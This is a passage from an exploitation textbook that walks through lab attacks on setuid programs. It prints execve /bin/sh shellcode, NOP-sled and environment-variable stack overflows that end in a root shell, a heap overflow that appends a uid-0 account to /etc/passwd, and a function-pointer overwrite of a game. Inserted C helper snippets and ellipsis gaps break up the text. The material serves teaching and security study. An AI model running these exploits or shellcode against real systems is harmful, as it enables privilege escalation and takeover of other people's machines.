'¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ
ÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"
(gdb)

At the first breakpoint, the buffer pointer shows the result of the for loop
...

The next instruction is a call to memset(), which starts at the beginning of the
buffer and sets 60 bytes of memory with the value 0x90
...

Breakpoint 2, main (argc=1, argv=0xbffff894) at exploit_notesearch
...
/notesearch '", '\220' ,
"¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿
¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"
(gdb)

Finally, the call to memcpy() will copy the shellcode bytes into buffer+60
...

Breakpoint 3, main (argc=1, argv=0xbffff894) at exploit_notesearch
...
/notesearch '", '\220' , "1À1Û1É\231°gÍ
\200j\vXQh//shh/
bin\211ãQ\211âS\211áÍ
\200¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"
(gdb)

Now the buffer contains the desired shellcode and is long enough to overwrite the
return address
...
But this return address
must point to the shellcode located in the same buffer
...
This can
be a difficult prediction to try to make with a dynamically changing stack
...
NOP is an assembly instruction that is short for
no operation
...
These
instructions are sometimes used to waste computational cycles for timing
purposes and are actually necessary in the SPARC processor architecture, due to
instruction pipelining
...
We'll create a large array (or sled) of these
NOP instructions and place it before the shellcode; then, if the EIP register points
to any address found in the NOP sled, it will increment while executing each NOP
instruction, one at a time, until it finally reaches the shellcode
...
On the x86 architecture, the NOP instruction is equivalent to the hex
byte 0x90
...
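The sliding behavior can be modeled without executing anything. In the sketch below, a byte array stands in for memory and a loop stands in for EIP stepping over single-byte NOPs; the function name slide_to_payload() is hypothetical, and the bytes after the sled are treated as opaque placeholders.

```c
#include <assert.h>
#include <stddef.h>

#define NOP 0x90   /* single-byte x86 NOP */

/* Starting at `entry`, step over NOP bytes the way EIP would advance, and
 * return the offset of the first non-NOP byte (or mem_size if none). */
size_t slide_to_payload(const unsigned char *mem, size_t mem_size, size_t entry) {
    assert(mem != NULL && entry <= mem_size);
    size_t pos = entry;
    while (pos < mem_size && mem[pos] == NOP)
        pos++;
    return pos;
}
```

With a 60-byte sled followed by other bytes, any entry offset from 0 through 59 ends at offset 60, which is the property that makes an approximate return address good enough.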

Even with a NOP sled, the approximate location of the buffer in memory must be
predicted in advance
...
By subtracting an offset from
this location, the relative address of any variable can be obtained
...
c
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // Zero out the new memory
...
/notesearch \'"); // Start command buffer
...

if(argc > 1) // Set offset
...

In the notesearch exploit, the address of the variable i in main()'s stack frame is
used as a point of reference
...
This offset was previously determined to be
270, but how is this number calculated?
The easiest way to determine this offset is experimentally
...

Since the notesearch exploit allows an optional command-line argument to define
the offset, different offsets can quickly be tested
...
c
reader@hacking:~/booksrc $
...
out 100
-------[ end of note data ]-------
reader@hacking:~/booksrc $
...
out 200
-------[ end of note data ]-------
reader@hacking:~/booksrc $

However, doing this manually is tedious and stupid
...
The seq command is a simple program that
generates sequences of numbers, which is typically used with looping
...
When three arguments are used, the middle argument
dictates how much to increment each time
...

reader@hacking:~/booksrc $ for i in $(seq 1 3 10)
> do
> echo The value is $i
> done
The value is 1
The value is 4
The value is 7
The value is 10
reader@hacking:~/booksrc $
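The same sequence can be written as an ordinary C loop, which may make the three seq arguments easier to read. This is a sketch with a hypothetical helper, seq_values(), and it assumes a positive step.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper mirroring `seq first step last` for a positive step:
 * store first, first+step, ... without passing last, up to out_cap values.
 * Returns how many values were stored. */
size_t seq_values(int first, int step, int last, int *out, size_t out_cap) {
    assert(out != NULL && step > 0);
    size_t n = 0;
    for (int v = first; v <= last && n < out_cap; v += step)
        out[n++] = v;
    return n;
}
```

seq_values(1, 3, 10, ...) stores 1, 4, 7, and 10, matching the shell output above.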

The function of the for loop should be familiar, even if the syntax is a little
different
...
Then everything between the do and done keywords
is executed
...
Since the NOP
sled is 60 bytes long, and we can return anywhere on the sled, there are about 60
bytes of wiggle room
...

reader@hacking:~/booksrc $ for i in $(seq 0 30 300)
> do
> echo Trying offset $i
>
...
out $i
> done

Trying offset 0
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999

When the right offset is used, the return address is overwritten with a value that
points somewhere on the NOP sled
...
This is how the default offset value was discovered
...
Fortunately, there are
other locations in memory where shellcode can be stashed
...
The example below sets an environment variable called MYVAR to the string
test
...
In addition, the env command will show all the environment variables
...

reader@hacking:~/booksrc $ export MYVAR=test
reader@hacking:~/booksrc $ echo $MYVAR
test
reader@hacking:~/booksrc $ env
SSH_AGENT_PID=7531
SHELL=/bin/bash
DESKTOP_STARTUP_ID=
TERM=xterm
GTK_RC_FILES=/etc/gtk/gtkrc:/home/reader/
...
2-gnome2
WINDOWID=39845969
OLDPWD=/home/reader
USER=reader
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;
01:or=4
0;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*
...
tgz=01;31:
*
...
taz=01;31:*
...
zip=01;31:*
...
Z=01;31:*
...
bz2=01;31:
*
...
rpm=01;31:*
...
jpg=01;35:*
...
gif=01;35:*
...
pbm=01;35:
*
...
ppm=01;35:*
...
xbm=01;35:*
...
tif=01;35:*
...
png=01;35:
*
...
mpg=01;35:*
...
avi=01;35:*
...
gl=01;35:*
...
xcf=01;35:
*
...
flac=01;35:*
...
mpc=01;35:*
...
wav=01;35:
SSH_AUTH_SOCK=/tmp/ssh-EpSEbS7489/agent
...
ICE-unix/7489
USERNAME=reader
DESKTOP_SESSION=default
...
UTF-8
GDMSESSION=default
...
0
MYVAR=test

LESSCLOSE=/usr/bin/lesspipe %s %s
RUNNING_UNDER_GDM=yes
COLORTERM=gnome-terminal
XAUTHORITY=/home/reader/
...
The shellcode from the notesearch exploit
can be used; we just need to put it into a file in binary form
...

reader@hacking:~/booksrc $ head exploit_notesearch
...
h>
#include ...
h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
reader@hacking:~/booksrc $ head exploit_notesearch
...
c | grep "^\"" | cut -d\" -f2
\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68
\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89
\xe1\xcd\x80
reader@hacking:~/booksrc $

The first 10 lines of the program are piped into grep, which only shows the lines
that begin with a quotation mark
...

BASH's for loop can actually be used to send each of these lines to an echo
command, with command-line options to recognize hex expansion and to suppress
adding a newline character to the end
...
c | grep "^\"" | cut -d\"
-f2)
> do
> echo -en $i

> done > shellcode
...
bin
00000000 31 c0 31 db 31 c9 99 b0 a4 cd 80 6a 0b 58 51 68 |1
...
1
...
XQh|
00000010 2f 2f 73 68 68 2f 62 69 6e 89 e3 51 89 e2 53 89 |//shh/bin
...
S
...
|
00000023
reader@hacking:~/booksrc $

Now we have the shellcode in a file called shellcode
...
This can be used with
command substitution to put shellcode into an environment variable, along with a
generous NOP sled
...
bin)
reader@hacking:~/booksrc $ echo $SHELLCODE
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣1␣1␣1␣␣␣ j
XQh//shh/bin␣␣Q␣␣S␣␣
reader@hacking:~/booksrc $

And just like that, the shellcode is now on the stack in an environment variable,
along with a 200-byte NOP sled
...

The environment variables are located near the bottom of the stack, so this is
where we should look when running notesearch in a debugger
...
/notesearch
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
This will
set up memory for the program, but it will stop before anything happens
...

(gdb) i r esp
esp 0xbffff660 0xbffff660
(gdb) x/24s $esp + 0x240
0xbffff8a0: ""
0xbffff8a1: ""
0xbffff8a2: ""
0xbffff8a3: ""
0xbffff8a4: ""
0xbffff8a5: ""
0xbffff8a6: ""
0xbffff8a7: ""
0xbffff8a8: ""
0xbffff8a9: ""
0xbffff8aa: ""
0xbffff8ab: "i686"
0xbffff8b0: "/home/reader/booksrc/notesearch"
0xbffff8d0: "SSH_AGENT_PID=7531"

0xbffffd56: "SHELLCODE=", '\220'
...
gtkrc-1
...
tar=01;31:*
...
arj=01
;31:*
...

0xbffffb29:
"1;31:*
...
zip=01;31:*
...
Z=01;31:*
...
bz2=01;31:*
...
rpm=01;3
1:*
...
jpg=01;35:*
...
gif=01;35:*
...
pbm=01;35:*
...
ppm=01
;35:*
...

(gdb) x/s 0xbffff8e3
0xbffff8e3: "SHELLCODE=", '\220'
...
(When
the program is run outside of the debugger, these addresses might be a little
different
...
But with a 200-byte NOP sled, these inconsistencies
aren't a problem if an address near the middle of the sled is picked
...
After determining the address of the
injected shellcode instructions, the exploitation is simply a matter of overwriting
the return address with this address
...
/notesearch $(perl -e 'print "\x47\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
sh-3
...
2#

The target address is repeated enough times to overflow the return address, and
execution returns into the NOP sled in the environment variable, which inevitably
leads to the shellcode
...

This usually makes exploitations quite a bit easier
...
In C's standard library there
is a function called getenv(), which accepts the name of an environment variable
as its only argument and returns that variable's memory address
...
c demonstrates the use of getenv()
...
c
#include ...
h>
int main(int argc, char *argv[]) {
printf("%s is at %p\n", argv[1], getenv(argv[1]));
}

When compiled and run, this program will display the location of a given
environment variable in its memory
...
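A slightly more defensive variant of the same idea is sketched below. It is not the book's program: the helper name describe_env() is hypothetical, and it adds a check for the case where the variable is not set, since getenv() returns NULL then.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>

/* Write "NAME is at ADDRESS" into out. Returns 0 on success, or -1 when
 * the variable is not set or out is too small. */
int describe_env(const char *name, char *out, size_t out_size) {
    assert(name != NULL && out != NULL);
    const char *value = getenv(name);
    if (value == NULL)
        return -1;                       /* variable is not in the environment */
    int n = snprintf(out, out_size, "%s is at %p", name, (void *)value);
    return (n >= 0 && (size_t)n < out_size) ? 0 : -1;
}
```

The printed address format depends on the platform, and the address itself is only meaningful inside the process that called getenv().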

reader@hacking:~/booksrc $ gcc getenv_example
...
/a
...
/notesearch $(perl -e 'print "\x0b\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
sh-3
...
This means the environment
prediction is still off
...
bin)
reader@hacking:~/booksrc $
...
out SLEDLESS
SLEDLESS is at 0xbfffff46
reader@hacking:~/booksrc $
...
The length of the name of the program being
executed seems to have an effect on the address of the environment variables
...
This type of experimentation and pattern recognition is an
important skill for a hacker to have
...
out a
reader@hacking:~/booksrc $
...
out bb
reader@hacking:~/booksrc $
...
out ccc
reader@hacking:~/booksrc $
...
/a
...
The
general trend seems to be a decrease of two bytes in the address of the
environment variable for every single-byte increase in the length of the program
name
...
out, since the difference in length
between the names a
...
This must mean the name of
the executing program is also located on the stack somewhere, which is causing
the shifting
...
This means the crutch of a
NOP sled can be eliminated
...
c program adjusts the address based
on the difference in program name length to provide a very accurate prediction
...
c
#include ...
h>
#include ...
*/
ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* Adjust for program name
...
This can be used
to exploit stack-based buffer overflows without the need for a NOP sled
...
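The adjustment itself is simple arithmetic and can be checked in isolation. The sketch below uses a hypothetical function, predict_env_address(), and applies the two-bytes-per-character trend to an observed address; the invocation names in the usage note ("./a.out" and "./notesearch") are assumptions about how the programs were run.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Predict where a variable will sit when `target_name` runs, given the
 * address observed while running `this_name`. Each extra character in the
 * program name moves the variable two bytes lower. */
uint32_t predict_env_address(uint32_t observed, const char *this_name,
                             const char *target_name) {
    assert(this_name != NULL && target_name != NULL);
    int64_t delta = ((int64_t)strlen(this_name)
                   - (int64_t)strlen(target_name)) * 2;
    return (uint32_t)((int64_t)observed + delta);
}
```

Under those assumptions, an address of 0xbfffff46 observed from a 7-character name shifts by (7 - 12) * 2 = -10 bytes for a 12-character name, giving 0xbfffff3c.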
c
reader@hacking:~/booksrc $
...
/notesearch
SLEDLESS will be at 0xbfffff3c
reader@hacking:~/booksrc $
...
The use of
environment variables simplifies things considerably when exploiting from the
command line, but these variables can also be used to make exploit code more
reliable
...
c program to execute a
command
...
The -c tells the sh program to execute commands from the
command-line argument passed to it
...
Go to
http://www
...
com/codesearch?q=package:libc+system to see this code in its
entirety
...
2
...
The fork() function starts a
new process, and the execl() function is used to run the command through
/bin/sh with the appropriate command-line arguments
...
If a setuid program uses
system(), the privileges won't be transferred, because /bin/sh has been dropping
privileges since version two
...
We can ignore the fork()
and just focus on the execl() function to run the command
...
The arguments for execl() start
with the path to the target program and are followed by each of the command-line
arguments
...
The last argument is a NULL to
terminate the argument list, similar to how a null byte terminates a string
...
This environment is presented in the form of an array of
pointers to null-terminated strings for each environment variable, and the
environment array itself is terminated with a NULL pointer
...
If the environment array is just the shellcode
as the first string (with a NULL pointer to terminate the list), the only
environment variable will be the shellcode
...
In Linux, the address will be 0xbffffffa, minus the length of the
shellcode in the environment, minus the length of the name of the executed
program
...
All
that's needed in the exploit buffer is the address, repeated enough times to
overflow the return address in the stack, as shown in exploit_notesearch_env
...

exploit_notesearch_env
...
h>
#include ...
h>
#include ...
/notesearch");
for(i=0; i < 160; i+=4)
*((unsigned int *)(buffer+i)) = ret;
execle("
...
Also, it doesn't start any additional processes
...
c
reader@hacking:~/booksrc $
...
out
-------[ end of note data ]-------
sh-3
...
As in
auth_overflow
...
This is true regardless of the
memory segment these variables reside in; however, the control tends to be quite
limited
...
While these types of
overflows aren't as standardized as stack-based overflows, they can be just as
effective
...
Two buffers are allocated on the heap, and the first
command-line argument is copied into the first buffer
...

Excerpt from notetaker
...

strcpy(buffer, argv[1]); // Copy into buffer
...
The
distance between these two addresses is 104 bytes
...
/notetaker test
[DEBUG] buffer @ 0x804a008: 'test'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
...

reader@hacking:~/booksrc $
...
This causes the datafile to be nothing but
a single null byte, which obviously cannot be opened as a file
...
/notetaker $(perl -e 'print "A"x104
...

*** glibc detected ***
...
so
...
so
...
/notetaker[0x8048916]
/lib/tls/i686/cmov/libc
...
6(__libc_start_main+0xdc)[0xb7eafebc]

...
so
...
so
...
5
...
5
...
5
...
5
...
5
...
This causes the program to write to testfile instead of /var/notes, as
it was originally programmed to do
...
Similar to the return address overwrite with stack overflows, there
are control points within the heap architecture itself
...
Since version 2
...
5, these functions have been
rewritten to print debugging information and terminate the program when they
detect problems with the heap header information
...
However, this particular exploit doesn't use heap header
information to do its magic, so by the time free() is called, the program has
already been tricked into writing to a new file with root privileges
...
c
if(write(fd, buffer, strlen(buffer)) == -1) // Write note
...

// Closing file
if(close(fd) == -1)
fatal("in main() while closing file");
printf("Note has been saved
...
/testfile
-rw------- 1 root reader 118 2007-09-09 16:19
...
/testfile
cat:
...
/testfile
?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
AAAAAAAAAtestfile
reader@hacking:~/booksrc $

A string is read until a null byte is encountered, so the entire string is written to
the file as the userinput
...
This also means that since the filename can be controlled, data
can be appended to any file
...

There are probably several clever ways to exploit this type of capability
...
This file
contains all of the usernames, IDs, and login shells for all the users of the system
...

reader@hacking:~/booksrc $ cp /etc/passwd /tmp/passwd
...
The password fields are all filled with the x character, since
the encrypted passwords are stored elsewhere in a shadow file
...
) In addition, any entry in the password
file that has a user ID of 0 will be given root privileges
...

The password can be encrypted using a one-way hashing algorithm
...
To prevent lookup attacks, the algorithm uses a salt value, which when varied
creates a different hash value for the same input password
...
The first argument is
the password, and the second is the salt value
...

reader@hacking:~/booksrc $ perl -e 'print crypt("password", "AA")
...
"\n"'
XXq2wKiyI43A2
reader@hacking:~/booksrc $

Notice that the salt value is always at the beginning of the hash
...
Using the salt value from the stored encrypted password, the system uses
the same one-way hashing algorithm to encrypt whatever text the user typed as
the password
...
This allows the password to be
used for authentication without requiring that the password be stored anywhere
on the system
...
The line to append to
/etc/passwd should look something like this:
myroot:XXq2wKiyI43A2:0:0:me:/root:/bin/bash

However, the nature of this particular heap overflow exploit won't allow that exact
line to be written to /etc/passwd, because the string must end with /etc/passwd
...
This can be compensated for with the clever use of a
symbolic file link, so the entry can both end with /etc/passwd and still be a valid
line in the password file
...
This means that a valid
login shell for the password file is also /tmp/etc/passwd, making the following a
valid password file line:
myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd

The values of this line just need to be slightly modified so that the portion before
/etc/passwd is exactly 104 bytes long:
reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp"' | wc -c
38
reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:"
...

":/root:/tmp"' | wc -c
86
reader@hacking:~/booksrc $ gdb -q
(gdb) p 104 - 86 + 50
$1 = 68
(gdb) quit
reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:"
...

":/root:/tmp"' | wc -c
104
reader@hacking:~/booksrc $

If /etc/passwd is added to the end of that final string (shown in bold), the string
above will be appended to the end of the /etc/passwd file
...

reader@hacking:~/booksrc $
...
"A"x68
...

*** glibc detected ***
...
so
...
so
...
/notetaker[0x8048916]
/lib/tls/i686/cmov/libc
...
6(__libc_start_main+0xdc)[0xb7eafebc]

...
so
...
so
...
5
...
5
...
5
...
5
...
5
...
c program enough, you will realize
that, as in a casino, most of the games are statistically weighted in favor of
the house
...

Perhaps there's a way to even the odds a bit
...
This pointer is stored in the user structure,
which is declared as a global variable
...

From game_of_chance
...

// Global variables
struct user player; // Player struct

The name buffer in the user structure is a likely place for an overflow
...

void input_name() {
char *name_ptr, input_char='\n';
while(input_char == '\n') // Flush any leftover
scanf("%c", &input_char); // newline chars
...
name); // name_ptr = player name's address
while(input_char != '\n') { // Loop until newline
...

scanf("%c", &input_char); // Get the next char
...

}
*name_ptr = 0; // Terminate the string
...
There is nothing to limit
it to the length of the destination name buffer, meaning an overflow is possible
...
This happens in the play_the_game()
function, which is called when any game is selected from the menu
...

if((choice < 1) || (choice > 7))
printf("\n[!!] The number %d is an invalid selection
...

if(choice != last_game) { // If the function ptr isn't set,
if(choice == 1) // then point it at the selected game
player
...
current_game = dealer_no_match;
else
player
...

}
play_the_game(); // Play the game
...
This means that in order to
get the program to call the function pointer without overwriting it, a game must
be played first to set the last_game variable
...
/game_of_chance
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 70 credits] -> 1
[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######
This game costs 10 credits to play
...

Pick a number between 1 and 20: 5
The winning number is 17
Sorry, you didn't win
...
/game_of_chance
reader@hacking:~/booksrc $

You can temporarily suspend the current process by pressing CTRL-Z
...
Back at the shell, we
figure out an appropriate overflow buffer, which can be copied and pasted in as a
name later
...
As
the output below shows, the name buffer is 100 bytes from the current_game
pointer within the user structure
...
c
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
c, line 41
...
out
Breakpoint 1, main () at game_of_chance
...

(gdb) p player
$1 = {uid = 0, credits = 0, highscore = 0, name = '\0' ,
current_game = 0}
(gdb) x/x &player
...
current_game
0x804b6d0 : 0x00000000
(gdb) p 0x804b6d0 - 0x804b66c
$2 = 100
(gdb) quit
The program is running
...
This can be copied and pasted into the interactive Game of Chance program
when it is resumed
...

reader@hacking:~/booksrc $ perl -e 'print "A"x100
...
"\n"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAABBBB
reader@hacking:~/booksrc $ fg

...

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB]
[You have 60 credits] -> 1
[DEBUG] current_game pointer @ 0x42424242
Segmentation fault
reader@hacking:~/booksrc $

Select menu option 5 to change the username, and paste in the overflow buffer
...
When menu option 1 is
selected again, the program will crash when it tries to call the function pointer
...

The nm command lists symbols in object files
...

reader@hacking:~/booksrc $ nm game_of_chance
0804b508 d _DYNAMIC
0804b5d4 d _GLOBAL_OFFSET_TABLE_
080496c4 R _IO_stdin_used
w _Jv_RegisterClasses
0804b4f8 d __CTOR_END__
0804b4f4 d __CTOR_LIST__
0804b500 d __DTOR_END__
0804b4fc d __DTOR_LIST__
0804a4f0 r __FRAME_END__
0804b504 d __JCR_END__
0804b504 d __JCR_LIST__
0804b630 A __bss_start
0804b624 D __data_start
08049670 t __do_global_ctors_aux

08048610 t __do_global_dtors_aux
0804b628 D __dso_handle
w __gmon_start__
08049669 T __i686
...
bx
0804b4f4 d __init_array_end
0804b4f4 d __init_array_start
080495f0 T __libc_csu_fini
08049600 T __libc_csu_init
U __libc_start_main@@GLIBC_2
...
0
0804b640 b completed
...
0
08048684 T fatal
080492bf T find_the_ace
08048650 t frame_dummy
080489cc T get_player_data
U getuid@@GLIBC_2
...
0
U open@@GLIBC_2
...
0
U perror@@GLIBC_2
...
0
U rand@@GLIBC_2
...
0
08048aaf T register_new_player
U scanf@@GLIBC_2
...
0
U strcpy@@GLIBC_2
...
0
08048e91 T take_wager
U time@@GLIBC_2
...
0
reader@hacking:~/booksrc $

The jackpot() function is a wonderful target for this exploit
...
Instead, the jackpot() function will just be called
directly, doling out the reward of 100 credits and tipping the scales in the player's
direction
...
The menu selections can be
scripted in a single buffer that is piped to the program's standard input
...
The following example will choose
menu item 1, try to guess the number 7, select n when asked to play again, and
finally select menu item 7 to quit
...
/game_of_chance
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 60 credits] ->
[DEBUG] current_game pointer @ 0x08048fde
####### Pick a Number ######
This game costs 10 credits to play
...

Pick a number between 1 and 20: The winning number is 20
Sorry, you didn't win
...

reader@hacking:~/booksrc $

This same technique can be used to script everything needed for the exploit
...
This will overflow
the current_game function pointer, so when the Pick a Number game is played
again, the jackpot() function is called directly
...
"A"x100
...
"1\nn\n"
...
"A"x100
...
"1\nn\n"
...
/game_of_chance
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 50 credits] ->
[DEBUG] current_game pointer @ 0x08048fde
####### Pick a Number ######
This game costs 10 credits to play
...

Pick a number between 1 and 20: The winning number is 15
Sorry, you didn't win
...

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 40 credits] ->
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 140 credits
Would you like to play again? (y/n) -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 140 credits] ->
Thanks for playing! Bye
...

reader@hacking:~/booksrc $ perl -e 'print "1\n5\nn\n5\n"
...
"\x70\x8d\x04\x08\n"
...
"y\n"x10
...
/game_of_chance
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 140 credits] ->
[DEBUG] current_game pointer @ 0x08048fde
####### Pick a Number ######
This game costs 10 credits to play
...

Pick a number between 1 and 20: The winning number is 1
Sorry, you didn't win
...

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 130 credits] ->
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 230 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 330 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 430 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 530 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 630 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 730 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 830 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 930 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 1030 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 1130 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 1230 credits
Would you like to play again? (y/n) -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
